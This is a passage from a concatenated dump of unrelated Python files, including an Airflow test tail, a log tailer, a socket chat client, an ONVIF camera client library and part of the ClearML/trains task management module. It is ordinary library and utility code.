c.args[0].split('.', 2)[1] for c in import_mock.call_args_list if c.args[0].startswith("airflow.")
}
assert "kubernetes" not in imported_airflow
# pod loading is not supported when kubernetes is not available
pod_override = {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
with pytest.raises(RuntimeError):
module.BaseSerialization.from_dict(pod_override)
# basic serialization should succeed
module.SerializedDAG.to_dict(make_simple_dag()["simple_dag"])
|
filetail.py
|
from multiprocessing import Process
import tailer
class FileTail:
"""A simple example class"""
def __init__(self, log_fpath):
open(log_fpath, 'a').close()
p = Process(target=self.f, args=(log_fpath,))
self.process = p
p.start()
def f(self, log_fpath):
for line in tailer.follow(open(log_fpath)):
print(line)
def stop(self):
self.process.terminate()
|
test_client.py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 6 09:02:52 2018
@author: author: Sandra Koster (sandra.koster@tno.nl)
"""
import time
import threading
import json
from horseModuleCore.horse_task_manager import HorseTaskManager
from horseModuleCore.ar_logger import ARLogger
def ARmain():
ar_logger = ARLogger()
print('init task manager')
tm = HorseTaskManager()
print('start task manager')
tm.start()
while True:
print("running")
tm.run_once()
taskdef_id = tm.getMPMSTaskID()
print("taskdef id: %s" % taskdef_id)
print("MPMS task: %s" % tm.MPMStask)
if (taskdef_id is not None) :
print(str(json.dumps(tm.MPMStask)))
wi_task_succes = True
if wi_task_succes:
print('Task SUCCES')
print('Task completed message: ' + str(tm.createTaskCompleteMessage()))
tm.sendMPMSTaskCompleted()
else:
print('Task FAILED')
print('Task completed message: ' + str(tm.createTaskFailedMessage()))
tm.sendMPMSTaskFailed()
time.sleep(0.5)
thread = threading.Thread(target = lambda: ARmain())
thread.start()
|
client.py
|
import socket
import errno
import sys
import threading
import time
HEADER_LENGTH = 10
IP = "192.168.1.2"
PORT = 1234
my_username = input("Username: ")
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((IP, PORT))
client_socket.setblocking(False)
username = bytes(my_username, "utf-8")
username = bytes(f"{len(username):<{HEADER_LENGTH}}", "utf-8") + username
client_socket.send(username)
def receive_message(name):
while True:
try:
while True:
username_header = client_socket.recv(HEADER_LENGTH)
if not username_header:
print("connection closed by the server")
input()
sys.exit()
username_length = int(username_header.decode("utf-8"))
username = client_socket.recv(username_length).decode("utf-8")
message_header = client_socket.recv(HEADER_LENGTH)
message_length = int(message_header.decode("utf-8"))
message = client_socket.recv(message_length).decode("utf-8")
print(f"{username}: {message}")
except IOError as e:
if e.errno != errno.EAGAIN and e.errno != errno.EWOULDBLOCK:
print(str(e))
input()
sys.exit()
#print(e)
time.sleep(1)
continue
x = threading.Thread(target=receive_message, args=(1,))
x.start()
while True:
message = input()
if message:
message = message.encode("utf-8")
message_header = f"{len(message):<{HEADER_LENGTH}}".encode("utf-8")
client_socket.send(message_header + message)
|
client.py
|
from __future__ import print_function, division
__version__ = '0.0.1'
import datetime as dt
import logging
import os.path
from threading import Thread, RLock
from zeep.client import Client, CachingClient, Settings
from zeep.wsse.username import UsernameToken
import zeep.helpers
from onvif.exceptions import ONVIFError
from onvif.definition import SERVICES
logger = logging.getLogger('onvif')
logging.basicConfig(level=logging.INFO)
logging.getLogger('zeep.client').setLevel(logging.CRITICAL)
# Ensure methods to raise an ONVIFError Exception
# when some thing was wrong
def safe_func(func):
def wrapped(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as err:
raise ONVIFError(err)
return wrapped
class UsernameDigestTokenDtDiff(UsernameToken):
"""
UsernameDigestToken class, with a time offset parameter that can be adjusted;
This allows authentication on cameras without being time synchronized.
Please note that using NTP on both end is the recommended solution,
this should only be used in "safe" environments.
"""
def __init__(self, user, passw, dt_diff=None, **kwargs):
super().__init__(user, passw, **kwargs)
self.dt_diff = dt_diff # Date/time difference in datetime.timedelta
def apply(self, envelope, headers):
old_created = self.created
if self.created is None:
self.created = dt.datetime.utcnow()
if self.dt_diff is not None:
self.created += self.dt_diff
result = super().apply(envelope, headers)
self.created = old_created
return result
class ONVIFService(object):
"""
Python Implemention for ONVIF Service.
Services List:
DeviceMgmt DeviceIO Event AnalyticsDevice Display Imaging Media
PTZ Receiver RemoteDiscovery Recording Replay Search Extension
>>> from onvif import ONVIFService
>>> device_service = ONVIFService('http://192.168.0.112/onvif/device_service',
... 'admin', 'foscam',
... '/etc/onvif/wsdl/devicemgmt.wsdl')
>>> ret = device_service.GetHostname()
>>> print ret.FromDHCP
>>> print ret.Name
>>> device_service.SetHostname(dict(Name='newhostname'))
>>> ret = device_service.GetSystemDateAndTime()
>>> print ret.DaylightSavings
>>> print ret.TimeZone
>>> dict_ret = device_service.to_dict(ret)
>>> print dict_ret['TimeZone']
There are two ways to pass parameter to services methods
1. Dict
params = {'Name': 'NewHostName'}
device_service.SetHostname(params)
2. Type Instance
params = device_service.create_type('SetHostname')
params.Hostname = 'NewHostName'
device_service.SetHostname(params)
"""
@safe_func
def __init__(self, xaddr, user, passwd, url,
encrypt=True, daemon=False, zeep_client=None, no_cache=False,
dt_diff=None, binding_name='', transport=None):
if not os.path.isfile(url):
raise ONVIFError('%s doesn`t exist!' % url)
self.url = url
self.xaddr = xaddr
wsse = UsernameDigestTokenDtDiff(user, passwd, dt_diff=dt_diff, use_digest=encrypt)
# Create soap client
if not zeep_client:
ClientType = Client if no_cache else CachingClient
settings = Settings()
settings.strict = False
settings.xml_huge_tree = True
self.zeep_client = ClientType(wsdl=url, wsse=wsse, transport=transport, settings=settings)
else:
self.zeep_client = zeep_client
self.ws_client = self.zeep_client.create_service(binding_name, self.xaddr)
# Set soap header for authentication
self.user = user
self.passwd = passwd
# Indicate wether password digest is needed
self.encrypt = encrypt
self.daemon = daemon
self.dt_diff = dt_diff
self.create_type = lambda x: self.zeep_client.get_element('ns0:' + x)()
@classmethod
@safe_func
def clone(cls, service, *args, **kwargs):
clone_service = service.ws_client.clone()
kwargs['ws_client'] = clone_service
return ONVIFService(*args, **kwargs)
@staticmethod
@safe_func
def to_dict(zeepobject):
# Convert a WSDL Type instance into a dictionary
return {} if zeepobject is None else zeep.helpers.serialize_object(zeepobject)
def service_wrapper(self, func):
@safe_func
def wrapped(params=None, callback=None):
def call(params=None, callback=None):
# No params
# print(params.__class__.__mro__)
if params is None:
params = {}
else:
params = ONVIFService.to_dict(params)
try:
ret = func(**params)
except TypeError:
ret = func(params)
if callable(callback):
callback(ret)
return ret
if self.daemon:
th = Thread(target=call, args=(params, callback))
th.daemon = True
th.start()
else:
return call(params, callback)
return wrapped
def __getattr__(self, name):
"""
Call the real onvif Service operations,
See the official wsdl definition for the
APIs detail(API name, request parameters,
response parameters, parameter types, etc...)
"""
builtin = name.startswith('__') and name.endswith('__')
if builtin:
return self.__dict__[name]
else:
return self.service_wrapper(getattr(self.ws_client, name))
class ONVIFCamera(object):
"""
Python Implementation of an ONVIF compliant device.
This class integrates ONVIF services
adjust_time parameter allows authentication on cameras without being time synchronized.
Please note that using NTP on both end is the recommended solution,
this should only be used in "safe" environments.
Also, this cannot be used on AXIS camera, as every request is authenticated, contrary to ONVIF standard
>>> from onvif import ONVIFCamera
>>> mycam = ONVIFCamera('192.168.0.112', 80, 'admin', '12345')
>>> mycam.devicemgmt.GetServices(False)
>>> media_service = mycam.create_media_service()
>>> ptz_service = mycam.create_ptz_service()
# Get PTZ Configuration:
>>> ptz_service.GetConfiguration()
"""
# Class-level variables
services_template = {'devicemgmt': None, 'ptz': None, 'media': None,
'imaging': None, 'events': None, 'analytics': None}
use_services_template = {'devicemgmt': True, 'ptz': True, 'media': True,
'imaging': True, 'events': True, 'analytics': True}
def __init__(self, host, port, user, passwd,
wsdl_dir=os.path.join(os.path.dirname(os.path.dirname(__file__)),
"wsdl"),
encrypt=True, daemon=False, no_cache=False, adjust_time=False,
transport=None):
os.environ.pop('http_proxy', None)
os.environ.pop('https_proxy', None)
self.host = host
self.port = int(port)
self.user = user
self.passwd = passwd
self.wsdl_dir = wsdl_dir
self.encrypt = encrypt
self.daemon = daemon
self.no_cache = no_cache
self.adjust_time = adjust_time
self.transport = transport
# Active service client container
self.services = {}
self.services_lock = RLock()
# Set xaddrs
self.update_xaddrs()
self.to_dict = ONVIFService.to_dict
def update_xaddrs(self):
# Establish devicemgmt service first
self.dt_diff = None
self.devicemgmt = self.create_devicemgmt_service()
if self.adjust_time:
cdate = self.devicemgmt.GetSystemDateAndTime().UTCDateTime
cam_date = dt.datetime(cdate.Date.Year, cdate.Date.Month, cdate.Date.Day,
cdate.Time.Hour, cdate.Time.Minute, cdate.Time.Second)
self.dt_diff = cam_date - dt.datetime.utcnow()
self.devicemgmt.dt_diff = self.dt_diff
self.devicemgmt = self.create_devicemgmt_service()
# Get XAddr of services on the device
self.xaddrs = {}
capabilities = self.devicemgmt.GetCapabilities({'Category': 'All'})
for name in capabilities:
capability = capabilities[name]
try:
if name.lower() in SERVICES and capability is not None:
ns = SERVICES[name.lower()]['ns']
self.xaddrs[ns] = capability['XAddr']
except Exception:
logger.exception('Unexpected service type')
with self.services_lock:
try:
self.event = self.create_events_service()
self.xaddrs['http://www.onvif.org/ver10/events/wsdl/PullPointSubscription'] = \
self.event.CreatePullPointSubscription().SubscriptionReference.Address._value_1
except Exception:
pass
def update_url(self, host=None, port=None):
changed = False
if host and self.host != host:
changed = True
self.host = host
if port and self.port != port:
changed = True
self.port = port
if not changed:
return
self.devicemgmt = self.create_devicemgmt_service()
self.capabilities = self.devicemgmt.GetCapabilities()
with self.services_lock:
for sname in self.services.keys():
xaddr = getattr(self.capabilities, sname.capitalize).XAddr
self.services[sname].ws_client.set_options(location=xaddr)
def get_service(self, name, create=True):
service = getattr(self, name.lower(), None)
if not service and create:
return getattr(self, 'create_%s_service' % name.lower())()
return service
def get_definition(self, name, portType=None):
"""Returns xaddr and wsdl of specified service"""
# Check if the service is supported
if name not in SERVICES:
raise ONVIFError('Unknown service %s' % name)
wsdl_file = SERVICES[name]['wsdl']
ns = SERVICES[name]['ns']
binding_name = '{%s}%s' % (ns, SERVICES[name]['binding'])
if portType:
ns += '/' + portType
wsdlpath = os.path.join(self.wsdl_dir, wsdl_file)
if not os.path.isfile(wsdlpath):
raise ONVIFError('No such file: %s' % wsdlpath)
# XAddr for devicemgmt is fixed:
if name == 'devicemgmt':
xaddr = '%s:%s/onvif/device_service' % \
(self.host if (self.host.startswith('http://') or self.host.startswith('https://'))
else 'http://%s' % self.host, self.port)
return xaddr, wsdlpath, binding_name
# Get other XAddr
xaddr = self.xaddrs.get(ns)
if not xaddr:
raise ONVIFError("Device doesn't support service: %s" % name)
return xaddr, wsdlpath, binding_name
def create_onvif_service(self, name, portType=None, transport=None):
"""
Create ONVIF service client.
:param name: service name, should be present as a key within
the `SERVICES` dictionary declared within the `onvif.definition` module
:param portType:
:param transport:
:return:
"""
"""Create ONVIF service client"""
name = name.lower()
xaddr, wsdl_file, binding_name = self.get_definition(name, portType)
with self.services_lock:
if not transport:
transport = self.transport
service = ONVIFService(xaddr, self.user, self.passwd,
wsdl_file, self.encrypt,
self.daemon, no_cache=self.no_cache,
dt_diff=self.dt_diff,
binding_name=binding_name,
transport=transport)
self.services[name] = service
setattr(self, name, service)
if not self.services_template.get(name):
self.services_template[name] = service
return service
def create_devicemgmt_service(self, transport=None):
# The entry point for devicemgmt service is fixed.
return self.create_onvif_service('devicemgmt', transport=transport)
def create_media_service(self, transport=None):
return self.create_onvif_service('media', transport=transport)
def create_ptz_service(self, transport=None):
return self.create_onvif_service('ptz', transport=transport)
def create_imaging_service(self, transport=None):
return self.create_onvif_service('imaging', transport=transport)
def create_deviceio_service(self, transport=None):
return self.create_onvif_service('deviceio', transport=transport)
def create_events_service(self, transport=None):
return self.create_onvif_service('events', transport=transport)
def create_analytics_service(self, transport=None):
return self.create_onvif_service('analytics', transport=transport)
def create_recording_service(self, transport=None):
return self.create_onvif_service('recording', transport=transport)
def create_search_service(self, transport=None):
return self.create_onvif_service('search', transport=transport)
def create_replay_service(self, transport=None):
return self.create_onvif_service('replay', transport=transport)
def create_pullpoint_service(self, transport=None):
return self.create_onvif_service('pullpoint',
portType='PullPointSubscription',
transport=transport)
def create_receiver_service(self, transport=None):
return self.create_onvif_service('receiver', transport=transport)
def create_notification_service(self, transport=None):
return self.create_onvif_service('notification', transport=transport)
def create_subscription_service(self, transport=None):
return self.create_onvif_service('subscription', transport=transport)
|
task.py
|
""" Backend task management support """
import collections
import itertools
import logging
import os
from enum import Enum
from threading import Thread
from multiprocessing import RLock
import six
from six.moves.urllib.parse import quote
from ...backend_interface.task.repo.scriptinfo import ScriptRequirements
from ...backend_interface.task.development.worker import DevWorker
from ...backend_api import Session
from ...backend_api.services import tasks, models, events, projects
from pathlib2 import Path
from ...utilities.pyhocon import ConfigTree, ConfigFactory
from ..base import IdObjectBase
from ..metrics import Metrics, Reporter
from ..model import Model
from ..setupuploadmixin import SetupUploadMixin
from ..util import make_message, get_or_create_project, get_single_result, \
exact_match_regex
from ...config import get_config_for_bucket, get_remote_task_id, TASK_ID_ENV_VAR, get_log_to_backend, \
running_remotely, get_cache_dir, DOCKER_IMAGE_ENV_VAR
from ...debugging import get_logger
from ...debugging.log import LoggerRoot
from ...storage import StorageHelper
from ...storage.helper import StorageError
from .access import AccessMixin
from .log import TaskHandler
from .repo import ScriptInfo
from ...config import config
class Task(IdObjectBase, AccessMixin, SetupUploadMixin):
""" Task manager providing task object access and management. Includes read/write access to task-associated
frames and models.
"""
_anonymous_dataview_id = '__anonymous__'
_development_tag = 'development'
class TaskTypes(Enum):
def __str__(self):
return str(self.value)
training = 'training'
testing = 'testing'
def __init__(self, session=None, task_id=None, log=None, project_name=None,
task_name=None, task_type=TaskTypes.training, log_to_backend=True,
raise_on_validation_errors=True, force_create=False):
"""
Create a new task instance.
:param session: Optional API Session instance. If not provided, a default session based on the system's
configuration will be used.
:type session: Session
:param task_id: Optional task ID. If not provided, a new task will be created using the API
and its information reflected in the resulting instance.
:type task_id: string
:param log: Optional log to be used. If not provided, and internal log shared with all backend objects will be
used instead.
:type log: logging.Logger
:param project_name: Optional project name, used only if a new task is created. The new task will be associated
with a project by this name. If no such project exists, a new project will be created using the API.
:type project_name: str
:param task_name: Optional task name, used only if a new task is created.
:type project_name: str
:param task_type: Optional task type, used only if a new task is created. Default is training task.
:type project_name: str (see tasks.TaskTypeEnum)
:param log_to_backend: If True, all calls to the task's log will be logged to the backend using the API.
This value can be overridden using the environment variable TRAINS_LOG_TASK_TO_BACKEND.
:type log_to_backend: bool
:param force_create: If True a new task will always be created (task_id, if provided, will be ignored)
:type force_create: bool
"""
task_id = self._resolve_task_id(task_id, log=log) if not force_create else None
self._edit_lock = RLock()
super(Task, self).__init__(id=task_id, session=session, log=log)
self._project_name = None
self._storage_uri = None
self._input_model = None
self._output_model = None
self._metrics_manager = None
self._reporter = None
self._curr_label_stats = {}
self._raise_on_validation_errors = raise_on_validation_errors
self._parameters_allowed_types = (
six.string_types + six.integer_types + (six.text_type, float, list, tuple, dict, type(None))
)
self._app_server = None
self._files_server = None
if not task_id:
# generate a new task
self.id = self._auto_generate(project_name=project_name, task_name=task_name, task_type=task_type)
else:
# this is an existing task, let's try to verify stuff
self._validate()
self._project_name = (self.project, project_name)
if running_remotely() or DevWorker.report_stdout:
log_to_backend = False
self._log_to_backend = log_to_backend
self._setup_log(default_log_to_backend=log_to_backend)
def _setup_log(self, default_log_to_backend=None, replace_existing=False):
"""
Setup logging facilities for this task.
:param default_log_to_backend: Should this task log to the backend. If not specified, value for this option
will be obtained from the environment, with this value acting as a default in case configuration for this is
missing.
If the value for this option is false, we won't touch the current logger configuration regarding TaskHandler(s)
:param replace_existing: If True and another task is already logging to the backend, replace the handler with
a handler for this task.
"""
# Make sure urllib is never in debug/info,
disable_urllib3_info = config.get('log.disable_urllib3_info', True)
if disable_urllib3_info and logging.getLogger('urllib3').isEnabledFor(logging.INFO):
logging.getLogger('urllib3').setLevel(logging.WARNING)
log_to_backend = get_log_to_backend(default=default_log_to_backend) or self._log_to_backend
if not log_to_backend:
return
# Handle the root logger and our own logger. We use set() to make sure we create no duplicates
# in case these are the same logger...
loggers = {logging.getLogger(), LoggerRoot.get_base_logger()}
# Find all TaskHandler handlers for these loggers
handlers = {logger: h for logger in loggers for h in logger.handlers if isinstance(h, TaskHandler)}
if handlers and not replace_existing:
# Handlers exist and we shouldn't replace them
return
# Remove all handlers, we'll add new ones
for logger, handler in handlers.items():
logger.removeHandler(handler)
# Create a handler that will be used in all loggers. Since our handler is a buffering handler, using more
# than one instance to report to the same task will result in out-of-order log reports (grouped by whichever
# handler instance handled them)
backend_handler = TaskHandler(self.session, self.task_id)
# Add backend handler to both loggers:
# 1. to root logger root logger
# 2. to our own logger as well, since our logger is not propagated to the root logger
# (if we propagate our logger will be caught be the root handlers as well, and
# we do not want that)
for logger in loggers:
logger.addHandler(backend_handler)
def _validate(self, check_output_dest_credentials=True):
raise_errors = self._raise_on_validation_errors
output_dest = self.get_output_destination(raise_on_error=False, log_on_error=False)
if output_dest and check_output_dest_credentials:
try:
self.log.info('Validating output destination')
conf = get_config_for_bucket(base_url=output_dest)
if not conf:
msg = 'Failed resolving output destination (no credentials found for %s)' % output_dest
self.log.warning(msg)
if raise_errors:
raise Exception(msg)
else:
StorageHelper._test_bucket_config(conf=conf, log=self.log, raise_on_error=raise_errors)
except StorageError:
raise
except Exception as ex:
self.log.error('Failed trying to verify output destination: %s' % ex)
@classmethod
def _resolve_task_id(cls, task_id, log=None):
if not task_id:
task_id = cls.normalize_id(get_remote_task_id())
if task_id:
log = log or get_logger('task')
log.info('Using task ID from env %s=%s' % (TASK_ID_ENV_VAR[0], task_id))
return task_id
def _update_repository(self):
def check_package_update():
try:
# check latest version
from ...utilities.check_updates import CheckPackageUpdates
latest_version = CheckPackageUpdates.check_new_package_available(only_once=True)
if latest_version:
if not latest_version[1]:
sep = os.linesep
self.get_logger().report_text(
'TRAINS new package available: UPGRADE to v{} is recommended!\nRelease Notes:\n{}'.format(
latest_version[0], sep.join(latest_version[2])),
)
else:
self.get_logger().report_text(
'TRAINS new version available: upgrade to v{} is recommended!'.format(
latest_version[0]),
)
except Exception:
pass
# get repository and create requirements.txt from code base
try:
check_package_update_thread = Thread(target=check_package_update)
check_package_update_thread.daemon = True
check_package_update_thread.start()
# do not request requirements, because it might be a long process, and we first want to update the git repo
result, script_requirements = ScriptInfo.get(log=self.log, create_requirements=False)
for msg in result.warning_messages:
self.get_logger().report_text(msg)
self.data.script = result.script
# Since we might run asynchronously, don't use self.data (lest someone else
# overwrite it before we have a chance to call edit)
self._edit(script=result.script)
self.reload()
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if result.script and script_requirements:
requirements, conda_requirements = script_requirements.get_requirements()
if requirements:
if not result.script['requirements']:
result.script['requirements'] = {}
result.script['requirements']['pip'] = requirements
result.script['requirements']['conda'] = conda_requirements
self._update_requirements(result.script.get('requirements') or '')
self.reload()
# we do not want to wait for the check version thread,
# because someone might wait for us to finish the repo detection update
except Exception as e:
get_logger('task').debug(str(e))
def _auto_generate(self, project_name=None, task_name=None, task_type=TaskTypes.training):
created_msg = make_message('Auto-generated at %(time)s by %(user)s@%(host)s')
project_id = None
if project_name:
project_id = get_or_create_project(self, project_name, created_msg)
tags = [self._development_tag] if not running_remotely() else []
extra_properties = {'system_tags': tags} if Session.check_min_api_version('2.3') else {'tags': tags}
req = tasks.CreateRequest(
name=task_name or make_message('Anonymous task (%(user)s@%(host)s %(time)s)'),
type=tasks.TaskTypeEnum(task_type.value),
comment=created_msg,
project=project_id,
input={'view': {}},
**extra_properties
)
res = self.send(req)
return res.response.id
def _set_storage_uri(self, value):
value = value.rstrip('/') if value else None
self._storage_uri = StorageHelper.conform_url(value)
self.data.output.destination = self._storage_uri
self._edit(output_dest=self._storage_uri or ('' if Session.check_min_api_version('2.3') else None))
if self._storage_uri or self._output_model:
self.output_model.upload_storage_uri = self._storage_uri
@property
def storage_uri(self):
if self._storage_uri:
return self._storage_uri
if running_remotely():
return self.data.output.destination
else:
return None
@storage_uri.setter
def storage_uri(self, value):
self._set_storage_uri(value)
@property
def task_id(self):
return self.id
@property
def name(self):
return self.data.name or ''
@name.setter
def name(self, value):
self.set_name(value)
@property
def task_type(self):
return self.data.type
@property
def project(self):
return self.data.project
@property
def parent(self):
return self.data.parent
@property
def input_model_id(self):
return self.data.execution.model
@property
def output_model_id(self):
return self.data.output.model
@property
def comment(self):
return self.data.comment or ''
@comment.setter
def comment(self, value):
self.set_comment(value)
@property
def cache_dir(self):
""" Cache dir used to store task related files """
return Path(get_cache_dir()) / self.id
@property
def status(self):
""" The task's status. In order to stay updated, we always reload the task info when this value is accessed. """
self.reload()
return self._status
@property
def _status(self):
""" Return the task's cached status (don't reload if we don't have to) """
return str(self.data.status)
@property
def input_model(self):
""" A model manager used to handle the input model object """
model_id = self._get_task_property('execution.model', raise_on_error=False)
if not model_id:
return None
if self._input_model is None:
self._input_model = Model(
session=self.session,
model_id=model_id,
cache_dir=self.cache_dir,
log=self.log,
upload_storage_uri=None)
return self._input_model
@property
def output_model(self):
""" A model manager used to manage the output model object """
if self._output_model is None:
self._output_model = self._get_output_model(upload_required=True)
return self._output_model
def create_output_model(self):
return self._get_output_model(upload_required=False, force=True)
def _get_output_model(self, upload_required=True, force=False):
return Model(
session=self.session,
model_id=None if force else self._get_task_property(
'output.model', raise_on_error=False, log_on_error=False),
cache_dir=self.cache_dir,
upload_storage_uri=self.storage_uri or self.get_output_destination(
raise_on_error=upload_required, log_on_error=upload_required),
upload_storage_suffix=self._get_output_destination_suffix('models'),
log=self.log)
@property
def metrics_manager(self):
""" A metrics manager used to manage the metrics related to this task """
return self._get_metrics_manager(self.get_output_destination())
@property
def reporter(self):
"""
Returns a simple metrics reporter instance
"""
if self._reporter is None:
self._setup_reporter()
return self._reporter
def _get_metrics_manager(self, storage_uri):
if self._metrics_manager is None:
self._metrics_manager = Metrics(
session=self.session,
task_id=self.id,
storage_uri=storage_uri,
storage_uri_suffix=self._get_output_destination_suffix('metrics')
)
return self._metrics_manager
def _setup_reporter(self):
try:
storage_uri = self.get_output_destination(log_on_error=False)
except ValueError:
storage_uri = None
self._reporter = Reporter(self._get_metrics_manager(storage_uri=storage_uri))
return self._reporter
def _get_output_destination_suffix(self, extra_path=None):
return '/'.join(quote(x, safe="'[]{}()$^,.; -_+-=") for x in
(self.get_project_name(), '%s.%s' % (self.name, self.data.id), extra_path) if x)
def _reload(self):
""" Reload the task object from the backend """
with self._edit_lock:
res = self.send(tasks.GetByIdRequest(task=self.id))
return res.response.task
def reset(self, set_started_on_success=True):
""" Reset the task. Task will be reloaded following a successful reset. """
self.send(tasks.ResetRequest(task=self.id))
if set_started_on_success:
self.started()
self.reload()
def started(self, ignore_errors=True):
""" Signal that this task has started """
return self.send(tasks.StartedRequest(self.id), ignore_errors=ignore_errors)
def stopped(self, ignore_errors=True):
""" Signal that this task has stopped """
return self.send(tasks.StoppedRequest(self.id), ignore_errors=ignore_errors)
def completed(self, ignore_errors=True):
""" Signal that this task has been completed """
if hasattr(tasks, 'CompletedRequest'):
return self.send(tasks.CompletedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors)
return self.send(tasks.StoppedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors)
def mark_failed(self, ignore_errors=True, status_reason=None, status_message=None):
""" Signal that this task has stopped """
return self.send(tasks.FailedRequest(self.id, status_reason=status_reason, status_message=status_message),
ignore_errors=ignore_errors)
def publish(self, ignore_errors=True):
""" Signal that this task will be published """
if str(self.status) != str(tasks.TaskStatusEnum.stopped):
raise ValueError("Can't publish, Task is not stopped")
resp = self.send(tasks.PublishRequest(self.id), ignore_errors=ignore_errors)
assert isinstance(resp.response, tasks.PublishResponse)
return resp
def update_model_desc(self, new_model_desc_file=None):
""" Change the task's model_desc """
with self._edit_lock:
execution = self._get_task_property('execution')
p = Path(new_model_desc_file)
if not p.is_file():
raise IOError('mode_desc file %s cannot be found' % new_model_desc_file)
new_model_desc = p.read_text()
model_desc_key = list(execution.model_desc.keys())[0] if execution.model_desc else 'design'
execution.model_desc[model_desc_key] = new_model_desc
res = self._edit(execution=execution)
return res.response
def update_output_model(self, model_uri, name=None, comment=None, tags=None):
"""
Update the task's output model.
Note that this method only updates the model's metadata using the API and does not upload any data. Use this
method to update the output model when you have a local model URI (e.g. storing the weights file locally and
providing a file://path/to/file URI)
:param model_uri: URI for the updated model weights file
:type model_uri: str
:param name: Optional updated model name
:type name: str
:param comment: Optional updated model description
:type comment: str
:param tags: Optional updated model tags
:type tags: [str]
"""
self._conditionally_start_task()
self._get_output_model(upload_required=False).update_for_task(model_uri, self.id, name, comment, tags)
def update_output_model_and_upload(
self, model_file, name=None, comment=None, tags=None, async_enable=False, cb=None, iteration=None):
"""
Update the task's output model weights file. File is first uploaded to the preconfigured output destination (see
task's output.destination property or call setup_upload()), than the model object associated with the task is
updated using an API call with the URI of the uploaded file (and other values provided by additional arguments)
:param model_file: Path to the updated model weights file
:type model_file: str
:param name: Optional updated model name
:type name: str
:param comment: Optional updated model description
:type comment: str
:param tags: Optional updated model tags
:type tags: [str]
:param async_enable: Request asynchronous upload. If False, the call blocks until upload is completed and the
API call updating the model returns. If True, the call returns immediately, while upload and update are
scheduled in another thread. Default is False.
:type async_enable: bool
:param cb: Asynchronous callback. If async=True, this callback will be invoked once the asynchronous upload and
update have completed.
:return: The URI of the uploaded weights file. If async=True, this is the expected URI as the upload is
probably still in progress.
"""
self._conditionally_start_task()
uri = self.output_model.update_for_task_and_upload(
model_file, self.id, name=name, comment=comment, tags=tags, async_enable=async_enable, cb=cb,
iteration=iteration
)
return uri
def _conditionally_start_task(self):
if str(self.status) == str(tasks.TaskStatusEnum.created):
self.started()
@property
def labels_stats(self):
""" Get accumulated label stats for the current/last frames iteration """
return self._curr_label_stats
def _accumulate_label_stats(self, roi_stats, reset=False):
if reset:
self._curr_label_stats = {}
for label in roi_stats:
if label in self._curr_label_stats:
self._curr_label_stats[label] += roi_stats[label]
else:
self._curr_label_stats[label] = roi_stats[label]
def set_input_model(self, model_id=None, model_name=None, update_task_design=True, update_task_labels=True):
"""
Set a new input model for this task. Model must be 'ready' in order to be used as the Task's input model.
:param model_id: ID for a model that exists in the backend. Required if model_name is not provided.
:param model_name: Model name. Required if model_id is not provided. If provided, this name will be used to
locate an existing model in the backend.
:param update_task_design: if True, the task's model design will be copied from the input model
:param update_task_labels: if True, the task's label enumeration will be copied from the input model
"""
if model_id is None and not model_name:
raise ValueError('Expected one of [model_id, model_name]')
if model_name:
# Try getting the model by name. Limit to 10 results.
res = self.send(
models.GetAllRequest(
name=exact_match_regex(model_name),
ready=True,
page=0,
page_size=10,
order_by='-created',
only_fields=['id', 'created']
)
)
model = get_single_result(entity='model', query=model_name, results=res.response.models, log=self.log)
model_id = model.id
if model_id:
res = self.send(models.GetByIdRequest(model=model_id))
model = res.response.model
if not model.ready:
# raise ValueError('Model %s is not published (not ready)' % model_id)
self.log.debug('Model %s [%s] is not published yet (not ready)' % (model_id, model.uri))
else:
# clear the input model
model = None
model_id = ''
with self._edit_lock:
# store model id
self.data.execution.model = model_id
# Auto populate input field from model, if they are empty
if update_task_design and not self.data.execution.model_desc:
self.data.execution.model_desc = model.design if model else ''
if update_task_labels and not self.data.execution.model_labels:
self.data.execution.model_labels = model.labels if model else {}
self._edit(execution=self.data.execution)
def set_parameters(self, *args, **kwargs):
"""
Set parameters for this task. This allows setting a complete set of key/value parameters, but does not support
parameter descriptions (as the input is a dictionary or key/value pairs.
:param args: Positional arguments (one or more dictionary or (key, value) iterable). These will be merged into
a single key/value dictionary.
:param kwargs: Key/value pairs, merged into the parameters dictionary created from `args`.
"""
if not all(isinstance(x, (dict, collections.Iterable)) for x in args):
raise ValueError('only dict or iterable are supported as positional arguments')
update = kwargs.pop('__update', False)
parameters = dict() if not update else self.get_parameters()
parameters.update(itertools.chain.from_iterable(x.items() if isinstance(x, dict) else x for x in args))
parameters.update(kwargs)
not_allowed = {
k: type(v).__name__
for k, v in parameters.items()
if not isinstance(v, self._parameters_allowed_types)
}
if not_allowed:
raise ValueError(
"Only builtin types ({}) are allowed for values (got {})".format(
', '.join(t.__name__ for t in self._parameters_allowed_types),
', '.join('%s=>%s' % p for p in not_allowed.items())),
)
# force cast all variables to strings (so that we can later edit them in UI)
parameters = {k: str(v) if v is not None else "" for k, v in parameters.items()}
with self._edit_lock:
execution = self.data.execution
if execution is None:
execution = tasks.Execution(parameters=parameters)
else:
execution.parameters = parameters
self._edit(execution=execution)
def set_parameter(self, name, value, description=None):
"""
Set a single task parameter. This overrides any previous value for this parameter.
:param name: Parameter name
:param value: Parameter value
:param description: Parameter description (unused for now)
"""
params = self.get_parameters()
params[name] = value
self.set_parameters(params)
def get_parameter(self, name, default=None):
"""
Get a value for a parameter.
:param name: Parameter name
:param default: Default value
:return: Parameter value (or default value if parameter is not defined)
"""
params = self.get_parameters()
return params.get(name, default)
def update_parameters(self, *args, **kwargs):
"""
Update parameters for this task.
This allows updating a complete set of key/value parameters,but does not support
parameter descriptions (as the input is a dictionary or key/value pairs.
:param args: Positional arguments (one or more dictionary or (key, value) iterable). These will be merged into
a single key/value dictionary.
:param kwargs: Key/value pairs, merged into the parameters dictionary created from `args`.
"""
self.set_parameters(__update=True, *args, **kwargs)
def set_model_label_enumeration(self, enumeration=None):
"""
Set a dictionary of labels (text) to ids (integers) {str(label): integer(id)}
:param dict enumeration: For example: {str(label): integer(id)}
"""
enumeration = enumeration or {}
with self._edit_lock:
execution = self.data.execution
if enumeration is None:
return
if not (isinstance(enumeration, dict)
and all(isinstance(k, six.string_types) and isinstance(v, int) for k, v in enumeration.items())):
